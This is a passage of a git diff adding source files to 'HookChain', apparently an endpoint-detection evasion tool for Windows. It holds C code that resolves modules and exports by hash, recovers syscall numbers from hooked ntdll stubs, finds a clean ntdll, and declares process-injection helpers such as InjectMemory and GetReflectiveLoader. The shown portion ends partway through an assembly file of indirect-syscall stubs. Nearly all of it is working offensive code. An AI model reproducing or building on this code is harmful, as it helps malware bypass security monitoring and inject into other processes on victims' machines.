+    PDWORD pdwNames = RVA2OFFSET(PDWORD, imageBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNames);
+    PWORD pwNameOrdinals = RVA2OFFSET(PDWORD, imageBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNameOrdinals);
+
+    LPCSTR pcName = NULL;
+    PVOID pAddress = NULL;
+
+    //LPCSTR
+
+    for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+        pcName = RVA2OFFSET(LPCSTR, imageBase, lpLocalAddress, va, pdwNames[i]);
+        pAddress = (PBYTE)imageBase + pdwFunctions[pwNameOrdinals[i]];
+        
+        if (procHash > 0) {
+            DWORD64 dwHash = djb2(((PBYTE)pcName) + 2);
+            if (dwHash == procHash)
+                return (PVOID)pAddress;
+        }
+
+        if ((procName != NULL) && (lstrcmpiA(pcName, procName) == 0))
+            return (PVOID)pAddress;
+        
+    }
+
+    return NULL;
+}
+
+static PVOID GetNextSyscallInstruction(_In_ PVOID pStartAddr)
+{
+    for (DWORD i = 0, j = 1; i <= 512; i++, j++) {
+        if (*((PBYTE)pStartAddr + i) == 0x0f && *((PBYTE)pStartAddr + j) == 0x05) {
+            return (PVOID)((ULONG_PTR)pStartAddr + i);
+        }
+    }
+
+    return NULL;
+}
+
+static DWORD64 GetSSN(_In_ PVOID pAddress)
+{
+    BYTE low, high;
+
+    /*
+        Handle non-hooked functions
+
+        mov r10, rcx
+        mov rax, <ssn>
+    */
+    if (*((PBYTE)pAddress + 0) == 0x4c && *((PBYTE)pAddress + 1) == 0x8b && *((PBYTE)pAddress + 2) == 0xd1 &&
+        *((PBYTE)pAddress + 3) == 0xb8 && *((PBYTE)pAddress + 6) == 0x00 && *((PBYTE)pAddress + 7) == 0x00) {
+
+        high = *((PBYTE)pAddress + 5);
+        low = *((PBYTE)pAddress + 4);
+
+        return (high << 8) | low;
+    }
+
+    // Derive SSN from neighbour syscalls
+    for (WORD idx = 1; idx <= MAX_NEIGHBOURS; idx++) {
+        if (*((PBYTE)pAddress + 0 + idx * NEXT) == 0x4c && *((PBYTE)pAddress + 1 + idx * NEXT) == 0x8b &&
+            *((PBYTE)pAddress + 2 + idx * NEXT) == 0xd1 && *((PBYTE)pAddress + 3 + idx * NEXT) == 0xb8 &&
+            *((PBYTE)pAddress + 6 + idx * NEXT) == 0x00 && *((PBYTE)pAddress + 7 + idx * NEXT) == 0x00) {
+
+            high = *((PBYTE)pAddress + 5 + idx * NEXT);
+            low = *((PBYTE)pAddress + 4 + idx * NEXT);
+
+            return (high << 8) | low - idx;
+        }
+
+        if (*((PBYTE)pAddress + 0 + idx * PREV) == 0x4c && *((PBYTE)pAddress + 1 + idx * PREV) == 0x8b &&
+            *((PBYTE)pAddress + 2 + idx * PREV) == 0xd1 && *((PBYTE)pAddress + 3 + idx * PREV) == 0xb8 &&
+            *((PBYTE)pAddress + 6 + idx * PREV) == 0x00 && *((PBYTE)pAddress + 7 + idx * PREV) == 0x00) {
+
+            high = *((PBYTE)pAddress + 5 + idx * PREV);
+            low = *((PBYTE)pAddress + 4 + idx * PREV);
+
+            return (high << 8) | low + idx;
+
+        }
+    }
+
+    return -1;
+}
+
+NTSTATUS NtAllocateVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect)
+{
+    return NtAllocateVirtualMemoryStub(ProcessHandle, BaseAddress, ZeroBits, RegionSize, AllocationType, Protect);
+}
+
+NTSTATUS NtWriteVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_ PVOID Buffer, _In_ ULONG NumberOfBytesToWrite, _Out_opt_ PULONG NumberOfBytesWritten)
+{
+    return NtWriteVirtualMemoryStub(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten);
+}
+
+NTSTATUS NtOpenProcess(_Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK AccessMask, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ PCLIENT_ID ClientId)
+{
+    return NtOpenProcessStub(ProcessHandle, AccessMask, ObjectAttributes, ClientId);
+}
+
+NTSTATUS NtProtectVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection)
+{
+    return NtProtectVirtualMemoryStub(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection);
+}
+
+NTSTATUS NtReadVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded)
+{
+    return NtReadVirtualMemoryStub(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded);
+}
+
+NTSTATUS NtQueryVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass, _Out_ PVOID Buffer, _In_ ULONG Length, _Out_opt_ PULONG ResultLength)
+{
+    return NtQueryVirtualMemoryStub(ProcessHandle, BaseAddress, MemoryInformationClass, Buffer, Length, ResultLength);
+}
+
+BOOL HReadProcessMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded)
+{
+    return (NtReadVirtualMemoryStub(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded) == 0);
+}
+
+BOOL HVirtualProtect(_Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection)
+{
+    return (NtProtectVirtualMemoryStub((HANDLE)-1, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection) == 0);
+}
+
+BOOL HVirtualProtectEx(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection)
+{
+    return (NtProtectVirtualMemoryStub(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection) == 0);
+}
+
+SIZE_T HVirtualQuery(_In_ PVOID* lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength)
+{
+    return HVirtualQueryEx((HANDLE)-1, lpAddress, lpBuffer, dwLength);
+}
+
+SIZE_T HVirtualQueryEx(_In_ HANDLE hProcess, _In_ PVOID* lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength)
+{
+    SIZE_T ResultLength = 0;
+    NtQueryVirtualMemoryStub(hProcess, lpAddress, MemoryBasicInformation, lpBuffer, dwLength, &ResultLength);
+    printf("VirtualQuery %d %d\n", dwLength, ResultLength);
+    return ResultLength;
+}
+
+PVOID RtlAllocateHeapStub(_In_ PVOID  HeapHandle, _In_ ULONG  Flags, _In_ SIZE_T Size) {
+
+    if (pRtlAllocateHeap == NULL) {
+        PVOID addr = malloc(Size);
+        if ((Flags & HEAP_ZERO_MEMORY) == HEAP_ZERO_MEMORY)
+            memset(addr, 0x00, Size);
+        return addr;
+    }
+
+    PVOID(*AH)(void) = pRtlAllocateHeap;
+    return AH(HeapHandle, Flags, Size);
+}
+
+DWORD64 djb2(PBYTE str)
+{
+    DWORD64 dwHash = 0x7734773477347734;
+    INT c;
+
+    while (c = (INT)((char)*str++))
+        dwHash = ((dwHash << 0x5) + dwHash) + c;
+
+    return dwHash;
+}
+
+BOOL GetBaseAddresses(VOID)
+{
+    if (ntdllBase && kernel32Base && kernelbaseBase)
+        return TRUE;
+
+    // the kernels base address and later this images newly loaded base address
+    ULONG_PTR uiBaseAddress;
+
+    PPEB pCurrentPeb;
+    PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+
+    PLIST_ENTRY pEntry = NULL;
+    PLIST_ENTRY pHeadEntry = NULL;
+
+    // get the Process Enviroment Block
+
+    pCurrentPeb = NtCurrentPeb();
+
+    if (!pCurrentPeb || pCurrentPeb->OSMajorVersion != 0x0a)
+        return NULL;
+
+    // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
+    uiBaseAddress = (ULONG_PTR)pCurrentPeb->LoaderData;
+
+    DWORD64 idx = ModList.Count;
+    if (idx == 0) {
+        idx = 1;
+        ModList.Count = 1;
+    }
+
+    pHeadEntry = &pCurrentPeb->LoaderData->InMemoryOrderModuleList;
+    pEntry = pHeadEntry->Flink;
+    while (pEntry != pHeadEntry)
+    {
+
+        pLdrDataEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
+        PWCHAR pcName = pLdrDataEntry->BaseDllName.Buffer;
+        DWORD64 dwHash = djb2((PBYTE)pLdrDataEntry->BaseDllName.Buffer);
+        
+        // compare the hash with that of kernel32.dll -> 0x5DC35DC35DC35DFF
+        if (dwHash == 0x5DC35DC35DC35DFF)
+        {
+            kernel32Base = (FARPROC)pLdrDataEntry->DllBase;
+        }
+        // compare the hash with that of ntdll.dll -> 0x5DC35DC35DC35E22
+        else if (dwHash == 0x5DC35DC35DC35E22)
+        {
+            ntdllBase = (FARPROC)pLdrDataEntry->DllBase;
+
+            //ntdll always should be the first
+            ModList.Entries[0].pAddress = (PVOID)pLdrDataEntry->DllBase;
+            ModList.Entries[0].dwHash = dwHash;
+        }
+
+        BOOL f = FALSE;
+        for (DWORD i = 0; i < ModList.Count; i++)
+        {
+            if (((DWORD64)ModList.Entries[i].pAddress == (DWORD64)pLdrDataEntry->DllBase) || (dwHash == ModList.Entries[i].dwHash))
+            {
+                f = TRUE;
+                break;
+            }
+        }
+
+        if (!f) {
+            ModList.Entries[ModList.Count].pAddress = (PVOID)pLdrDataEntry->DllBase;
+            ModList.Entries[ModList.Count].dwHash = dwHash;
+            ModList.Count++;
+        }
+
+        // we stop searching when we have found everything we need.
+        if (ntdllBase && kernel32Base)
+            break;
+
+        // get the next entry
+        pEntry = pEntry->Flink;
+
+    }
+
+    if (!ntdllBase) {
+        ntdllBase = GetClearNtdll();
+        ModList.Entries[0].pAddress = ntdllBase;
+        ModList.Entries[0].dwHash = 0x5DC35DC35DC35E22;
+    }
+
+    if (!kernelbaseBase)
+        kernelbaseBase = LoadLibraryA("kernelbase");
+
+    if (ntdllBase && kernel32Base && kernelbaseBase)
+        return TRUE;
+
+    return FALSE;
+}
+
+//Look for a clear version of NTDLL
+PVOID GetClearNtdll(VOID)
+{
+
+    // the kernels base address and later this images newly loaded base address
+    ULONG_PTR uiBaseAddress;
+    PPEB pCurrentPeb;
+    PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+    PLIST_ENTRY pEntry = NULL;
+    PLIST_ENTRY pHeadEntry = NULL;
+
+    PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+    PIMAGE_DOS_HEADER pImageDosHeader;
+    PIMAGE_NT_HEADERS pImageNtHeaders;
+    PVOID pBase;
+    PDWORD pdwFunctions;
+    PDWORD pdwNames;
+    PWORD pwNameOrdinals;
+    LPCSTR pcName = NULL;
+    PVOID pAddress = NULL;
+
+    // get the Process Enviroment Block
+
+    pCurrentPeb = NtCurrentPeb();
+
+    if (!pCurrentPeb || pCurrentPeb->OSMajorVersion != 0x0a)
+        return NULL;
+
+    // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
+    uiBaseAddress = (ULONG_PTR)pCurrentPeb->LoaderData;
+
+    pHeadEntry = &pCurrentPeb->LoaderData->InMemoryOrderModuleList;
+    pEntry = pHeadEntry->Flink;
+    while (pEntry != pHeadEntry)
+    {
+
+        pLdrDataEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
+        PWCHAR pcName = pLdrDataEntry->BaseDllName.Buffer;
+        //DWORD64 dwHash = djb2((PBYTE)pLdrDataEntry->BaseDllName.Buffer);
+
+        pBase = pLdrDataEntry->DllBase;
+        pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+
+        if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+            goto nextmod;
+
+        pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+
+        if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+            goto nextmod;
+
+        if (pImageNtHeaders->OptionalHeader.DataDirectory[0].Size == 0)
+            goto nextmod;
+
+        pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+        pdwFunctions = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfFunctions);
+        pdwNames = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNames);
+        pwNameOrdinals = (PWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNameOrdinals);
+
+        //LPCSTR
+        int cnt = 0;
+
+        for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+            pcName = (PCHAR)((PBYTE)pBase + pdwNames[i]);
+
+            // Is this a system call?
+            if ((*(USHORT*)pcName != 'tN'))
+                continue;
+
+            cnt++;
+        }
+
+        if (cnt > 200)
+            return pBase;
+
+    nextmod:
+        // get the next entry
+        pEntry = pEntry->Flink;
+    }
+
+    return NULL;
+}
diff --git a/HookChain/HookChain/hook.h b/HookChain/HookChain/hook.h
new file mode 100644
index 0000000..9509e61
--- /dev/null
+++ b/HookChain/HookChain/hook.h
@@ -0,0 +1,115 @@
+//===============================================================================================//
+#ifndef _OKCHAIN_OK_H
+#define _OKCHAIN_OK_H
+//===============================================================================================//
+
+#include <Windows.h>
+#include "windows_common.h"
+
+#define DEBUG
+//#undef DEBUG
+
+#define MAX_ENTRIES 512
+#define PREV -32
+#define NEXT 32
+#define MAX_NEIGHBOURS 500
+
+typedef struct _SYSCALL_INFO {
+	DWORD64 dwSsn;
+	PVOID pAddress;
+	PVOID pSyscallRet;
+	PVOID pStubFunction;
+	DWORD64 dwHash;
+	BOOL bIsHooked;
+} SYSCALL_INFO, * PSYSCALL_INFO;
+
+typedef struct _SYSCALL_LIST
+{
+	DWORD64 Count;
+	SYSCALL_INFO Entries[MAX_ENTRIES];
+} SYSCALL_LIST, * PSYSCALL_LIST;
+
+typedef struct _FUNCTION_CODE {
+	BYTE     Buffer[40];
+} FUNCTION_CODE, * PFUNCTION_CODE;
+
+typedef struct _MODULE_INFO {
+	PVOID pAddress;
+	DWORD64 dwHash;
+} MODULE_INFO, * PMODULE_INFO;
+
+typedef struct _MODULE_LIST
+{
+	DWORD64 Count;
+	MODULE_INFO Entries[MAX_ENTRIES];
+} MODULE_LIST, * PMODULE_LIST;
+
+typedef struct _FUNCTION_NAME {
+	BYTE     Buffer[255];
+} FUNCTION_NAME, * PFUNCTION_NAME;
+
+typedef struct _NAME_LIST
+{
+	DWORD64 Count;
+	FUNCTION_NAME Entries[50];
+} NAME_LIST, * PNAME_LIST;
+
+
+
+static PVOID GetNextSyscallInstruction(_In_ PVOID pStartAddr);
+static DWORD64 GetSSN(_In_ PVOID pAddress);
+FARPROC HGetModuleHandleA(LPCSTR imageName, _In_ BOOLEAN forceLoad);
+FARPROC HGetProcAddress(LPCSTR imageName, LPCSTR procName);
+FARPROC HGetProcAddress3(FARPROC imageBase, LPCSTR procName);
+BOOL UnhookAll(_In_ HANDLE hProcess, _In_ LPCSTR imageName, _In_ BOOLEAN force);
+BOOL ProcAllByAddr(_In_ LPCSTR imageBaseName, _In_ PVOID imageBase, _In_opt_ HANDLE hProcess);
+PVOID GetClearNtdll(VOID);
+
+BOOL GetBaseAddresses(VOID);
+BOOL InitApi(VOID);
+DWORD64 djb2(PBYTE str);
+
+typedef VOID(*PPS_APC_ROUTINE)(PVOID SystemArgument1, PVOID SystemArgument2, PVOID SystemArgument3, PCONTEXT ContextRecord);
+
+NTSTATUS NtAllocateReserveObject(_Out_ PHANDLE MemoryReserveHandle, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ MEMORY_RESERVE_OBJECT_TYPE ObjectType);
+NTSTATUS NtAllocateVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect);
+NTSTATUS NtCreateProcessEx(_Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ParentProcess, _In_ ULONG Flags, _In_opt_ HANDLE SectionHandle, _In_opt_ HANDLE DebugPort, _In_opt_ HANDLE ExceptionPort, _In_ BOOLEAN InJob);
+NTSTATUS NtCreateThreadEx(_Out_ PHANDLE ThreadHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ProcessHandle, _In_ PVOID StartRoutine, _In_opt_ PVOID Argument, _In_ ULONG CreateFlags, _In_opt_ ULONG_PTR ZeroBits, _In_opt_ SIZE_T StackSize, _In_opt_ SIZE_T MaximumStackSize, _In_opt_ PVOID AttributeList);
+NTSTATUS NtOpenProcess(_Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK AccessMask, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ PCLIENT_ID ClientId);
+NTSTATUS NtQueryInformationProcess(_In_ HANDLE ProcessHandle, _In_ PROCESS_INFORMATION_CLASS ProcessInformationClass, _Out_ PVOID ProcessInformation, _In_ ULONG ProcessInformationLength, _Out_ PULONG ReturnLength);
+NTSTATUS NtQueueApcThreadEx(_In_ HANDLE ThreadHandle, _In_ HANDLE UserApcReserveHandle, _In_ PPS_APC_ROUTINE ApcRoutine, _In_opt_ PVOID SystemArgument1, _In_opt_ PVOID SystemArgument2, _In_opt_ PVOID SystemArgument3);
+NTSTATUS NtProtectVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection);
+NTSTATUS NtReadVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded);
+NTSTATUS NtResumeThread(_In_ HANDLE ThreadHandle, _Out_opt_ PULONG SuspendCount);
+NTSTATUS NtWaitForSingleObject(_In_ HANDLE ObjectHandle, _In_ BOOLEAN Alertable OPTIONAL, _In_ PLARGE_INTEGER TimeOut);
+NTSTATUS NtWriteVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_ PVOID Buffer, _In_ ULONG NumberOfBytesToWrite, _Out_opt_ PULONG NumberOfBytesWritten);
+
+BOOL HReadProcessMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded);
+BOOL HVirtualProtect(_Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection);
+BOOL HVirtualProtectEx(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection);
+SIZE_T HVirtualQuery(_In_ PVOID lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength);
+SIZE_T HVirtualQueryEx(_In_ HANDLE hProcess, _In_ PVOID lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength);
+
+// Local defs
+
+DWORD InitSyscallInfo(PSYSCALL_INFO pSyscallInfo, PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, DWORD64 dwHash);
+ULONG InjectMemory(HANDLE ProcessHandle, PVOID DestinationAddress, ULONG NumberOfBytesToWrite);
+PVOID GetReflectiveLoader(PVOID pModuleBase);
+PVOID RtlAllocateHeapStub(_In_ PVOID  HeapHandle, _In_ ULONG  Flags, _In_ SIZE_T Size);
+
+static PVOID pRtlAllocateHeap;
+static PVOID pUn;
+#if _WIN64
+#define NtCurrentTeb()            ((PTEB)__readgsqword(0x30))
+#else
+#define NtCurrentTeb()            ((PTEB)__readfsdword(0x16))
+#endif
+
+#define NtCurrentPeb()            (NtCurrentTeb()->ProcessEnvironmentBlock)
+#define RtlProcessHeap()          (NtCurrentPeb()->ProcessHeap)
+
+#define Local()					  ((HANDLE)-1)
+
+//===============================================================================================//
+#endif
+//===============================================================================================//
diff --git a/HookChain/HookChain/hookchain.asm b/HookChain/HookChain/hookchain.asm
new file mode 100644
index 0000000..adff7de
--- /dev/null
+++ b/HookChain/HookChain/hookchain.asm
@@ -0,0 +1,4399 @@
+.data
+	qTableAddr QWORD 0h
+    qListEntrySize QWORD 30h
+    qStubEntrySize QWORD 14h
+    qUnhookAddr QWORD 0h
+    qUnhookAddr2 QWORD 0h
+    qPayloadAddr QWORD 0h
+    qPayloadSize QWORD 0h
+
+    qDebug QWORD 0h
+
+    qIdx0 QWORD 0h
+    qIdx1 QWORD 0h
+    qIdx2 QWORD 0h
+    qIdx3 QWORD 0h
+    qIdx4 QWORD 0h
+    qIdx5 QWORD 0h
+    qIdx6 QWORD 0h
+    
+EXTERN PrintCall: PROC
+;EXTERN PayloadPointer: PROC
+;EXTERN payload: BYTE
+
+.code
+    Stop PROC
+        int 3
+        ret
+    Stop ENDP
+    
+    GetZeroAddr PROC
+        jmp short st1
+
+        st2:
+            pop rax
+            ret
+
+        st1:
+            call st2
+    GetZeroAddr ENDP
+
+    RetZero PROC
+        xor rax, rax
+        ret
+    RetZero ENDP
+
+    SetDebug PROC
+		mov qDebug, rcx
+        xor rax, rax
+		ret
+	SetDebug ENDP
+    
+    SetAddr PROC
+		mov qUnhookAddr, rcx
+        xor rax, rax
+		ret
+	SetAddr ENDP
+    
+    ExecAddr PROC
+        mov rax, qUnhookAddr
+        test rax, rax
+		je e1
+        jmp rax
+        e1:
+        ret
+	ExecAddr ENDP
+    
+    SetAddr2 PROC
+		mov qUnhookAddr2, rcx
+        xor rax, rax
+		ret
+	SetAddr2 ENDP
+    
+    ExecAddr2 PROC
+        mov rax, qUnhookAddr2
+        test rax, rax
+		je e1
+        jmp rax
+        e1:
+        ret
+	ExecAddr2 ENDP
+    
+    SetPayloadData PROC
+		mov qPayloadAddr, rcx
+        mov qPayloadSize, rdx
+        xor rax, rax
+		ret
+	SetPayloadData ENDP
+    
+    RtlCompareStringStub PROC
+        mov rax, 0h
+        ret
+    RtlCompareStringStub ENDP
+    
+    RtlEqualStringStub PROC
+        mov rax, 1h
+        ret
+    RtlEqualStringStub ENDP
+
+    Caller PROC
+        mov rax, [rsp]
+        ret
+    Caller ENDP
+
+    Execute PROC
+        push rbp
+        mov rbp, rsp
+        mov rax, rcx
+        sub rsp, 20h
+        xor rdx, rdx
+        dec rdx
+        shl rdx, 4
+		and rsp, rdx
+        xor rdx, rdx
+		mov rcx, rdx
+		mov r8, rdx
+		mov r9, rdx
+		mov [rsp], rdx
+		mov [rsp + 08h], rdx
+		mov [rsp + 10h], rdx
+		mov [rsp + 18h], rdx
+		call rax
+        mov rsp, rbp
+        pop rbp
+        ret
+    Execute ENDP
+
+	SetIdx PROC
+		mov rax, 0h
+        lea r12, qIdx0
+        mov [r12 + rcx * 8], rdx
+		mov rax, 1h
+		ret
+	SetIdx ENDP
+    
+    SetTableAddr PROC
+        xor rax, rax
+		mov qTableAddr, 0h
+		mov qTableAddr, rcx
+        call GetAddr
+        xor r11, r11
+        mov r14, rax
+        mov rcx, 200h
+        L1:
+            mov rax, r11
+            mov rdx, qStubEntrySize
+            mul rdx
+            push rcx
+            mov rcx, r11
+            lea rdx, [r14 + rax]
+            call SetIdxProc
+            pop rcx
+            inc r11
+            loop L1
+        
+		mov rax, 1h
+		ret
+	SetTableAddr ENDP
+	
+    SetIdxProc PROC
+		mov rax, rcx
+        mov r12, rdx
+        mov rdx, qListEntrySize
+        mul rdx
+        mov rdx, r12
+        mov r12, qTableAddr
+        lea rax, [r12 + rax]
+        mov [rax + 18h], rdx
+		ret
+	SetIdxProc ENDP
+    
+    SyscallExec PROC
+        
+        cmp qDebug, 01h   ; Check if is DEBUG enabled
+        jne exec
+
+        ; Code responsible to do a callback to function PrintCall
+        push rsi
+        mov rsi, [rsp + 08h]
+        push rbp
+        push rax
+        push rcx
+        push rdx
+        push r8
+        push r9
+        mov rbp, rsp
+        mov rcx, rax
+        mov rdx, rsi
+        mov r8, rsp
+        sub rsp, 20h
+        call PrintCall
+        mov rsp, rbp
+        pop r9
+        pop r8
+        pop rdx
+        pop rcx
+        pop rax
+        pop rbp
+        pop rsi
+        ; finish print
+
+        exec:
+        sub rsp, 08h   ; Address to place syscall addr and use with ret
+        push r12
+        push r9
+        push r8
+        push rdx
+        push rcx
+        push rbp
+        mov rbp, rsp
+
+        
+        mov r12, rdx
+        mov rdx, qListEntrySize
+        mul rdx
+        mov rdx, r12
+        mov r12, qTableAddr
+        lea rax, [r12 + rax]
+        mov r12, [rax + 10h]
+        mov rax, [rax]
+
+        mov [rbp + 30h], r12    ; 0x30 = 6 * 8 = 48
+        mov rsp, rbp
+        pop rbp
+        pop rcx
+        pop rdx
+        pop r8
+        pop r9
+        pop r12
+
+        mov r10, rcx
+        ret   ; jmp to the address saved at stack
+    SyscallExec ENDP
+
+    ; Functions used to the first Bypass
+    NtOpenProcessStub PROC
+        mov rax, qIdx0
+        jmp SyscallExec
+        ret
+    NtOpenProcessStub ENDP
+    
+    NtProtectVirtualMemoryStub PROC
+        mov rax, qIdx1
+        jmp SyscallExec
+        ret
+    NtProtectVirtualMemoryStub ENDP
+
+    NtReadVirtualMemoryStub PROC
+        mov rax, qIdx2
+        jmp SyscallExec
+        ret
+    NtReadVirtualMemoryStub ENDP
+
+    NtWriteVirtualMemoryStub PROC
+        mov rax, qIdx3
+        jmp SyscallExec
+        ret
+    NtWriteVirtualMemoryStub ENDP
+
+    NtAllocateVirtualMemoryStub PROC
+        mov rax, qIdx4
+        jmp SyscallExec
+        ret
+    NtAllocateVirtualMemoryStub ENDP
+    
+    NtDelayExecutionStub PROC
+        mov rax, qIdx5
+        jmp SyscallExec
+        ret
+    NtDelayExecutionStub ENDP
+    
+    NtQueryVirtualMemoryStub PROC
+        mov rax, qIdx6
+        jmp SyscallExec
+        ret
+    NtQueryVirtualMemoryStub ENDP
+
+    GetData PROC
+        mov r10, rcx
+        mov r11, rdx
+        mov rdx, qListEntrySize
+        mul rdx
+        mov rdx, r12
+        mov r12, qTableAddr
+        lea rax, [r12 + rax]
+        lea r12, [rax + 10h]
+        mov [r10], rax
+        mov [r11], r12
+        mov rax, 1h
+        ret
+    GetData ENDP
+
+    GetAddr PROC
+        lea rax, OFFSET L1
+        inc rax
+        ret
+        L1:
+        db 90h
+    GetAddr ENDP
+    
+    ; Jmp functions
+    
+    Fnc0000 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0000h
+        ret
+        nop
+    Fnc0000 ENDP
+
+    Fnc0001 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0001h
+        ret
+        nop
+    Fnc0001 ENDP
+
+    Fnc0002 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0002h
+        ret
+        nop
+    Fnc0002 ENDP
+
+    Fnc0003 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0003h
+        ret
+        nop
+    Fnc0003 ENDP
+
+    Fnc0004 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0004h
+        ret
+        nop
+    Fnc0004 ENDP
+
+    Fnc0005 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0005h
+        ret
+        nop
+    Fnc0005 ENDP
+
+    Fnc0006 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0006h
+        ret
+        nop
+    Fnc0006 ENDP
+
+    Fnc0007 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0007h
+        ret
+        nop
+    Fnc0007 ENDP
+
+    Fnc0008 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0008h
+        ret
+        nop
+    Fnc0008 ENDP
+
+    Fnc0009 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0009h
+        ret
+        nop
+    Fnc0009 ENDP
+
+    Fnc000A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 000ah
+        ret
+        nop
+    Fnc000A ENDP
+
+    Fnc000B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 000bh
+        ret
+        nop
+    Fnc000B ENDP
+
+    Fnc000C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 000ch
+        ret
+        nop
+    Fnc000C ENDP
+
+    Fnc000D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 000dh
+        ret
+        nop
+    Fnc000D ENDP
+
+    Fnc000E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 000eh
+        ret
+        nop
+    Fnc000E ENDP
+
+    Fnc000F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 000fh
+        ret
+        nop
+    Fnc000F ENDP
+
+    Fnc0010 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0010h
+        ret
+        nop
+    Fnc0010 ENDP
+
+    Fnc0011 PROC
